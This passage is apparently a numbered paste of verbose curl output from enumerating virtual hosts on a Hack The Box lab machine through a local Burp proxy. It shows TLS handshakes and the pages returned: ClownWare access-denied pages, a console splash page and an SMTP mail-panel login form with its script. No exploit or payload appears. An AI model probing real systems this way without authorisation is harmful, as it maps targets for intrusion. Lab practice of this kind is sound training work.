  744. > User-Agent: curl/7.61.0
  745. > Proxy-Connection: Keep-Alive
  746. >
  747. < HTTP/1.0 200 Connection established
  748. <
  749. * Proxy replied 200 to CONNECT request
  750. * CONNECT phase completed!
  751. * ALPN, offering h2
  752. * ALPN, offering http/1.1
  753. * successfully set certificate verify locations:
  754. *   CAfile: none
  755.  CApath: /etc/ssl/certs
  756. * (304) (OUT), TLS handshake, Client hello (1):
  757. * CONNECT phase completed!
  758. * CONNECT phase completed!
  759. * (304) (IN), TLS handshake, Server hello (2):
  760. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  761. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  762. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  763. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  764. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  765. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  766. * TLSv1.2 (IN), TLS handshake, Finished (20):
  767. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  768. * ALPN, server did not agree to a protocol
  769. * Server certificate:
  770. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  771. *  start date: Jan 21 17:26:12 2014 GMT
  772. *  expire date: Jan 21 17:26:12 2038 GMT
  773. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  774. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  775. > GET / HTTP/1.1
  776. > Host: *.clownware.htb
  777. > User-Agent: curl/7.61.0
  778. > Accept: */*
  779. >
  780. < HTTP/1.1 200 OK
  781. < Date: Thu, 20 Dec 2018 00:41:09 GMT
  782. < Content-Type: text/html; charset=UTF-8
  783. < Connection: close
  784. < Server: ClownWare Proxy
  785. < Content-Length: 3475
  786. <
  787. <!DOCTYPE html>
  788. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  789. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  790. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  791. <!--[if gt IE 8]><!-->
  792. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  793. <title>Direct IP access not allowed | ClownWare</title>
  794. <meta charset="UTF-8">
  795. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  796. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  797. <meta name="robots" content="noindex, nofollow">
  798. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  799. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  800. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  801. <style type="text/css">body{margin:0;padding:0}</style>
  802.  
  803.  
  804. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  805. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  806.  
  807.  
  808.  
  809. </head>
  810. <body>
  811.  <div id="cf-wrapper">
  812.    <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  813.    <div id="cf-error-details" class="cf-error-details-wrapper">
  814.      <div class="cf-wrapper cf-header cf-error-overview">
  815.        <h1>
  816.          <span class="cf-error-type" data-translate="error">Error</span>
  817.          <span class="cf-error-code">1003</span>
  818.          <small class="heading-ray-id">Ray ID: b78687238673cee4
  819. • 2018-12-20 00:41:09 GMT
  820. </small>
  821.        </h1>
  822.        <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  823.      </div><!-- /.header -->
  824.  
  825.      <section></section><!-- spacer -->
  826.  
  827.      <div class="cf-section cf-wrapper">
  828.        <div class="cf-columns two">
  829.          <div class="cf-column">
  830.            <h2 data-translate="what_happened">What happened?</h2>
  831.            <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  832.           </div>
  833.  
  834.          
  835.           <div class="cf-column">
  836.             <h2 data-translate="what_can_i_do">What can I do?</h2>
  837.             <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  838.           </div>
  839.          
  840.         </div>
  841.       </div><!-- /.section -->
  842.  
  843.       <div class="cf-error-footer cf-wrapper">
  844.   <p>
  845.     <span class="cf-footer-item">ClownWare Ray ID: <strong>8a277d1d4b193fab
  846. </strong></span>
  847.     <span class="cf-footer-separator"></span>
  848.     <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  849.     <span class="cf-footer-separator"></span>
  850.     <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  851.    
  852.   </p>
  853. </div><!-- /.error-footer -->
  854.  
  855.  
  856.     </div><!-- /#cf-error-details -->
  857.   </div><!-- /#cf-wrapper -->
  858.  
  859.   <script type="text/javascript">
  860.   window._cf_translation = {};
  861.  
  862.  
  863. </script>
  864.  
  865.  
  866.  
  867. * Closing connection 0
  868. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  869. </body></html>
  870.  
  871. proxy.clownware.htb
  872. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  873. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  874. *   Trying 127.0.0.1...
  875. * TCP_NODELAY set
  876. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  877. * allocate connect buffer!
  878. * Establish HTTP proxy tunnel to 10.10.10.144:443
  879. > CONNECT 10.10.10.144:443 HTTP/1.1
  880. > Host: 10.10.10.144:443
  881. > User-Agent: curl/7.61.0
  882. > Proxy-Connection: Keep-Alive
  883. >
  884. < HTTP/1.0 200 Connection established
  885. <
  886. * Proxy replied 200 to CONNECT request
  887. * CONNECT phase completed!
  888. * ALPN, offering h2
  889. * ALPN, offering http/1.1
  890. * successfully set certificate verify locations:
  891. *   CAfile: none
  892.   CApath: /etc/ssl/certs
  893. * (304) (OUT), TLS handshake, Client hello (1):
  894. * CONNECT phase completed!
  895. * CONNECT phase completed!
  896. * (304) (IN), TLS handshake, Server hello (2):
  897. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  898. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  899. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  900. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  901. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  902. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  903. * TLSv1.2 (IN), TLS handshake, Finished (20):
  904. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  905. * ALPN, server did not agree to a protocol
  906. * Server certificate:
  907. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  908. *  start date: Jan 21 17:26:12 2014 GMT
  909. *  expire date: Jan 21 17:26:12 2038 GMT
  910. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  911. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  912. > GET / HTTP/1.1
  913. > Host: proxy.clownware.htb
  914. > User-Agent: curl/7.61.0
  915. > Accept: */*
  916. >
  917. < HTTP/1.1 200 OK
  918. < Date: Thu, 20 Dec 2018 00:41:09 GMT
  919. < Content-Type: text/html; charset=UTF-8
  920. < Connection: close
  921. < Server: ClownWare Proxy
  922. < Content-Length: 3475
  923. <
  924. <!DOCTYPE html>
  925. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  926. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  927. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  928. <!--[if gt IE 8]><!-->
  929. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  930. <title>Direct IP access not allowed | ClownWare</title>
  931. <meta charset="UTF-8">
  932. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  933. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  934. <meta name="robots" content="noindex, nofollow">
  935. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  936. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  937. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  938. <style type="text/css">body{margin:0;padding:0}</style>
  939.  
  940.  
  941. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  942. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  943.  
  944.  
  945.  
  946. </head>
  947. <body>
  948.   <div id="cf-wrapper">
  949.     <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  950.     <div id="cf-error-details" class="cf-error-details-wrapper">
  951.       <div class="cf-wrapper cf-header cf-error-overview">
  952.         <h1>
  953.           <span class="cf-error-type" data-translate="error">Error</span>
  954.           <span class="cf-error-code">1003</span>
  955.           <small class="heading-ray-id">Ray ID: 30f832a0efc934e2
  956.  • 2018-12-20 00:41:09 GMT
  957. </small>
  958.         </h1>
  959.         <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  960.       </div><!-- /.header -->
  961.  
  962.       <section></section><!-- spacer -->
  963.  
  964.       <div class="cf-section cf-wrapper">
  965.         <div class="cf-columns two">
  966.           <div class="cf-column">
  967.             <h2 data-translate="what_happened">What happened?</h2>
  968.             <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  969.          </div>
  970.  
  971.          
  972.          <div class="cf-column">
  973.            <h2 data-translate="what_can_i_do">What can I do?</h2>
  974.            <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  975.          </div>
  976.          
  977.        </div>
  978.      </div><!-- /.section -->
  979.  
  980.      <div class="cf-error-footer cf-wrapper">
  981.  <p>
  982.    <span class="cf-footer-item">ClownWare Ray ID: <strong>30240e4c416065eb
  983. </strong></span>
  984.    <span class="cf-footer-separator">•</span>
  985.    <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  986.    <span class="cf-footer-separator">•</span>
  987.    <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  988.    
  989.  </p>
  990. </div><!-- /.error-footer -->
  991.  
  992.  
  993.    </div><!-- /#cf-error-details -->
  994.  </div><!-- /#cf-wrapper -->
  995.  
  996.  <script type="text/javascript">
  997.  window._cf_translation = {};
  998.  
  999.  
  1000. </script>
  1001.  
  1002.  
  1003.  
  1004. * Closing connection 0
  1005. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1006. </body></html>
  1007.  
  1008. console.flujab.htb
  1009. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1010. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1011. *   Trying 127.0.0.1...
  1012. * TCP_NODELAY set
  1013. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1014. * allocate connect buffer!
  1015. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1016. > CONNECT 10.10.10.144:443 HTTP/1.1
  1017. > Host: 10.10.10.144:443
  1018. > User-Agent: curl/7.61.0
  1019. > Proxy-Connection: Keep-Alive
  1020. >
  1021. < HTTP/1.0 200 Connection established
  1022. <
  1023. * Proxy replied 200 to CONNECT request
  1024. * CONNECT phase completed!
  1025. * ALPN, offering h2
  1026. * ALPN, offering http/1.1
  1027. * successfully set certificate verify locations:
  1028. *   CAfile: none
  1029.  CApath: /etc/ssl/certs
  1030. * (304) (OUT), TLS handshake, Client hello (1):
  1031. * CONNECT phase completed!
  1032. * CONNECT phase completed!
  1033. * (304) (IN), TLS handshake, Server hello (2):
  1034. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1035. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1036. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1037. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1038. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1039. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1040. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1041. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1042. * ALPN, server did not agree to a protocol
  1043. * Server certificate:
  1044. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1045. *  start date: Jan 21 17:26:12 2014 GMT
  1046. *  expire date: Jan 21 17:26:12 2038 GMT
  1047. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1048. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1049. > GET / HTTP/1.1
  1050. > Host: console.flujab.htb
  1051. > User-Agent: curl/7.61.0
  1052. > Accept: */*
  1053. >
  1054. < HTTP/1.1 200 OK
  1055. < Date: Thu, 20 Dec 2018 00:41:10 GMT
  1056. < Content-Type: text/html; charset=UTF-8
  1057. < Connection: close
  1058. < Server: ClownWare Proxy
  1059. < Content-Length: 519
  1060. <
  1061. <!DOCTYPE html>
  1062. <html>
  1063.    <head>
  1064.        <title>Access Granted!</title>
  1065.        <embed src="/dialup.m4a" volume="60" height="0" width="0" autostart="true" loop="true"  width="0" height="0">
  1066.    </head>
  1067.        <style type="text/css">
  1068.            body {
  1069.                background-color: #000;
  1070.            }
  1071.            img {
  1072.            width: 70%;
  1073.            height: auto;
  1074.        }
  1075.        </style>
  1076.    </head>
  1077.    <body>
  1078.        <center>
  1079.            <img src="/console.gif"/>
  1080.  
  1081.        </center>
  1082.    </body>
  1083. * Closing connection 0
  1084. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1085. </html>
  1086.  
  1087. sys.flujab.htb
  1088. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1089. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1090. *   Trying 127.0.0.1...
  1091. * TCP_NODELAY set
  1092. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1093. * allocate connect buffer!
  1094. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1095. > CONNECT 10.10.10.144:443 HTTP/1.1
  1096. > Host: 10.10.10.144:443
  1097. > User-Agent: curl/7.61.0
  1098. > Proxy-Connection: Keep-Alive
  1099. >
  1100. < HTTP/1.0 200 Connection established
  1101. <
  1102. * Proxy replied 200 to CONNECT request
  1103. * CONNECT phase completed!
  1104. * ALPN, offering h2
  1105. * ALPN, offering http/1.1
  1106. * successfully set certificate verify locations:
  1107. *   CAfile: none
  1108.  CApath: /etc/ssl/certs
  1109. * (304) (OUT), TLS handshake, Client hello (1):
  1110. * CONNECT phase completed!
  1111. * CONNECT phase completed!
  1112. * (304) (IN), TLS handshake, Server hello (2):
  1113. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1114. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1115. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1116. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1117. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1118. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1119. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1120. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1121. * ALPN, server did not agree to a protocol
  1122. * Server certificate:
  1123. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1124. *  start date: Jan 21 17:26:12 2014 GMT
  1125. *  expire date: Jan 21 17:26:12 2038 GMT
  1126. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1127. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1128. > GET / HTTP/1.1
  1129. > Host: sys.flujab.htb
  1130. > User-Agent: curl/7.61.0
  1131. > Accept: */*
  1132. >
  1133. < HTTP/1.1 200 OK
  1134. < Date: Thu, 20 Dec 2018 00:41:10 GMT
  1135. < Content-Type: text/html; charset=UTF-8
  1136. < Connection: close
  1137. < Server: ClownWare Proxy
  1138. < Content-Length: 3475
  1139. <
  1140. <!DOCTYPE html>
  1141. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  1142. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  1143. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  1144. <!--[if gt IE 8]><!-->
  1145. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  1146. <title>Direct IP access not allowed | ClownWare</title>
  1147. <meta charset="UTF-8">
  1148. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  1149. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  1150. <meta name="robots" content="noindex, nofollow">
  1151. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  1152. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  1153. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  1154. <style type="text/css">body{margin:0;padding:0}</style>
  1155.  
  1156.  
  1157. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  1158. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  1159.  
  1160.  
  1161.  
  1162. </head>
  1163. <body>
  1164.  <div id="cf-wrapper">
  1165.    <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  1166.    <div id="cf-error-details" class="cf-error-details-wrapper">
  1167.      <div class="cf-wrapper cf-header cf-error-overview">
  1168.        <h1>
  1169.          <span class="cf-error-type" data-translate="error">Error</span>
  1170.          <span class="cf-error-code">1003</span>
  1171.          <small class="heading-ray-id">Ray ID: 2489ba982fd37a16
  1172. • 2018-12-20 00:41:10 GMT
  1173. </small>
  1174.        </h1>
  1175.        <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  1176.      </div><!-- /.header -->
  1177.  
  1178.      <section></section><!-- spacer -->
  1179.  
  1180.      <div class="cf-section cf-wrapper">
  1181.        <div class="cf-columns two">
  1182.          <div class="cf-column">
  1183.            <h2 data-translate="what_happened">What happened?</h2>
  1184.            <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  1185.           </div>
  1186.  
  1187.          
  1188.           <div class="cf-column">
  1189.             <h2 data-translate="what_can_i_do">What can I do?</h2>
  1190.             <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  1191.           </div>
  1192.          
  1193.         </div>
  1194.       </div><!-- /.section -->
  1195.  
  1196.       <div class="cf-error-footer cf-wrapper">
  1197.   <p>
  1198.     <span class="cf-footer-item">ClownWare Ray ID: <strong>d35bedc6ad2f159a
  1199. </strong></span>
  1200.     <span class="cf-footer-separator"></span>
  1201.     <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  1202.     <span class="cf-footer-separator"></span>
  1203.     <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  1204.    
  1205.   </p>
  1206. </div><!-- /.error-footer -->
  1207.  
  1208.  
  1209.     </div><!-- /#cf-error-details -->
  1210.   </div><!-- /#cf-wrapper -->
  1211.  
  1212.   <script type="text/javascript">
  1213.   window._cf_translation = {};
  1214.  
  1215.  
  1216. </script>
  1217.  
  1218.  
  1219.  
  1220. * Closing connection 0
  1221. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1222. </body></html>
  1223.  
  1224. smtp.flujab.htb
  1225. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1226. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1227. *   Trying 127.0.0.1...
  1228. * TCP_NODELAY set
  1229. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1230. * allocate connect buffer!
  1231. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1232. > CONNECT 10.10.10.144:443 HTTP/1.1
  1233. > Host: 10.10.10.144:443
  1234. > User-Agent: curl/7.61.0
  1235. > Proxy-Connection: Keep-Alive
  1236. >
  1237. < HTTP/1.0 200 Connection established
  1238. <
  1239. * Proxy replied 200 to CONNECT request
  1240. * CONNECT phase completed!
  1241. * ALPN, offering h2
  1242. * ALPN, offering http/1.1
  1243. * successfully set certificate verify locations:
  1244. *   CAfile: none
  1245.   CApath: /etc/ssl/certs
  1246. * (304) (OUT), TLS handshake, Client hello (1):
  1247. * CONNECT phase completed!
  1248. * CONNECT phase completed!
  1249. * (304) (IN), TLS handshake, Server hello (2):
  1250. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1251. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1252. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1253. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1254. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1255. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1256. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1257. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1258. * ALPN, server did not agree to a protocol
  1259. * Server certificate:
  1260. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1261. *  start date: Jan 21 17:26:12 2014 GMT
  1262. *  expire date: Jan 21 17:26:12 2038 GMT
  1263. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1264. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1265. > GET / HTTP/1.1
  1266. > Host: smtp.flujab.htb
  1267. > User-Agent: curl/7.61.0
  1268. > Accept: */*
  1269. >
  1270. < HTTP/1.1 200 OK
  1271. < Date: Thu, 20 Dec 2018 00:41:10 GMT
  1272. < Content-Type: text/html; charset=UTF-8
  1273. < Connection: close
  1274. < Server: ClownWare Proxy
  1275. < Content-Length: 4954
  1276. <
  1277. <!DOCTYPE HTML>
  1278. <html>
  1279.     <head>
  1280.         <title>SMTP Mail Box</title>
  1281.         <meta charset="utf-8" />
  1282.         <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"/>
  1283.         <link rel="stylesheet" href="assets/css/main.css"/>
  1284.     </head>
  1285.     <body class="homepage is-preload">
  1286.         <div id="page-wrapper">
  1287.  
  1288.             <!-- Header -->
  1289.                 <section id="header" class="wrapper style3">
  1290.  
  1291.                     <!-- Logo -->
  1292.                         <div id="logo">
  1293.                             <h1><a href="/?login">SMTP Mail Configuration</a></h1>
  1294.                         </br>
  1295.                             <!-- NOW DEPRICATED! This function has been integrated into the new free service application!-->
  1296.                         </div>
  1297.                 </section>
  1298.     <!-- Scripts -->
  1299.     <script src="assets/js/jquery.min.js"></script>
  1300.     <script src="assets/js/jquery.dropotron.min.js"></script>
  1301.     <script src="assets/js/browser.min.js"></script>
  1302.     <script src="assets/js/breakpoints.min.js"></script>
  1303.     <script src="assets/js/util.js"></script>
  1304.     <script src="assets/js/main.js"></script>
  1305. <section id="main" class="wrapper style4">
  1306.  
  1307. <div style="margin: 0 auto; max-width: 32em;">
  1308.     <h2>Log in here for your Mail-in-a-Box control panel.</h2>
  1309.   <form class="form-horizontal" role="form" onsubmit="do_login(); return false;">
  1310.     <div class="form-group">
  1311.       <label for="inputEmail3" class="col-sm-3 control-label">Email</label>
  1312.       <div class="col-sm-9">
  1313.         <input name="email" type="email" class="form-control" id="loginEmail" placeholder="admin@flujab.htb">
  1314.       </div>
  1315.     </div>
  1316.     <div class="form-group">
  1317.       <label for="inputPassword3" class="col-sm-3 control-label">Password</label>
  1318.       <div class="col-sm-9">
  1319.         <input name="password" type="password" class="form-control" id="loginPassword" placeholder="Password">
  1320.       </div>
  1321.     </div>
  1322.     <div class="form-group">
  1323.       <div class="col-sm-offset-3 col-sm-9">
  1324.       </div>
  1325.     </div>
  1326.     <div class="form-group">
  1327.       <div class="col-sm-offset-3 col-sm-9">
  1328.         <div>
  1329.         </div>
  1330.         <button type="submit" class="btn btn-default">Sign in</button>
  1331.       </div>
  1332.     </div>
  1333.   </form>
  1334. </div>
  1335.  
  1336.  
  1337. <script>
  1338. function do_login() {
  1339.   if ($('#loginEmail').val() == "") {
  1340.     show_modal_error("Login Failed", "Enter your email address.", function() {
  1341.     $('#loginEmail').focus();
  1342.     });
  1343.     return false;
  1344.   }
  1345.   if ($('#loginPassword').val() == "") {
  1346.     show_modal_error("Login Failed", "Enter your email password.", function() {
  1347.         $('#loginPassword').focus();
  1348.     });
  1349.     return false;
  1350.   }
  1351.   // Exchange the email address & password for an API key.
  1352.   api_credentials = [$('#loginEmail').val(), $('#loginPassword').val()]
  1353.   api(
  1354.   "/me",
  1355.   "GET",
  1356.   { },
  1357.   function(response){
  1358.     // This API call always succeeds. It returns a JSON object indicating
  1359.     // whether the request was authenticated or not.
  1360.     if (response.status != "ok") {
  1361.       // Show why the login failed.
  1362.       show_modal_error("Login Failed", response.reason)
  1363.       // Reset any saved credentials.
  1364.       do_logout();
  1365.     } else if (!("api_key" in response)) {
  1366.       // Login succeeded but user might not be authorized!
  1367.       show_modal_error("Login Failed", "You are not an administrator on this system.")
  1368.       // Reset any saved credentials.
  1369.       do_logout();
  1370.     } else {
  1371.       // Login succeeded.
  1372.       // Save the new credentials.
  1373.       api_credentials = [response.email, response.api_key];
  1374.       // Try to wipe the username/password information.
  1375.       $('#loginEmail').val('');
  1376.       $('#loginPassword').val('');
  1377.       // Remember the credentials.
  1378.       if (typeof localStorage != 'undefined' && typeof sessionStorage != 'undefined') {
  1379.         if ($('#loginRemember').val()) {
  1380.           localStorage.setItem("miab-cp-credentials", api_credentials.join(":"));
  1381.           sessionStorage.removeItem("miab-cp-credentials");
  1382.         } else {
  1383.           localStorage.removeItem("miab-cp-credentials");
  1384.           sessionStorage.setItem("miab-cp-credentials", api_credentials.join(":"));
  1385.         }
  1386.       }
  1387.       // Open the next panel the user wants to go to. Do this after the XHR response
  1388.       // is over so that we don't start a new XHR request while this one is finishing,
  1389.      // which confuses the loading indicator.
  1390.      setTimeout(function() { show_panel(!switch_back_to_panel || switch_back_to_panel == "login" ? 'system_status' : switch_back_to_panel) }, 300);
  1391.    }
  1392.  })
  1393. }
  1394. function do_logout() {
  1395.  api_credentials = ["", ""];
  1396.  if (typeof localStorage != 'undefined')
  1397.    localStorage.removeItem("miab-cp-credentials");
  1398.  if (typeof sessionStorage != 'undefined')
  1399.    sessionStorage.removeItem("miab-cp-credentials");
  1400.  show_panel('login');
  1401. }
  1402. function show_login() {
  1403.  $('#loginEmail,#loginPassword').each(function() {
  1404.     var input = $(this);
  1405.     if (!$.trim(input.val())) {
  1406.       input.focus();
  1407.       return false;
  1408.     }
  1409.   });
  1410. }
  1411. * Closing connection 0
  1412. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1413. </script>
  1414.  
  1415. vaccine4flu.htb
  1416. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1417. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1418. *   Trying 127.0.0.1...
  1419. * TCP_NODELAY set
  1420. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1421. * allocate connect buffer!
  1422. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1423. > CONNECT 10.10.10.144:443 HTTP/1.1
  1424. > Host: 10.10.10.144:443
  1425. > User-Agent: curl/7.61.0
  1426. > Proxy-Connection: Keep-Alive
  1427. >
  1428. < HTTP/1.0 200 Connection established
  1429. <
  1430. * Proxy replied 200 to CONNECT request
  1431. * CONNECT phase completed!
  1432. * ALPN, offering h2
  1433. * ALPN, offering http/1.1
  1434. * successfully set certificate verify locations:
  1435. *   CAfile: none
  1436.   CApath: /etc/ssl/certs
  1437. * (304) (OUT), TLS handshake, Client hello (1):
  1438. * CONNECT phase completed!
  1439. * CONNECT phase completed!
  1440. * (304) (IN), TLS handshake, Server hello (2):
  1441. * TLSv1.2 (IN), TLS handshake, Certificate (11):
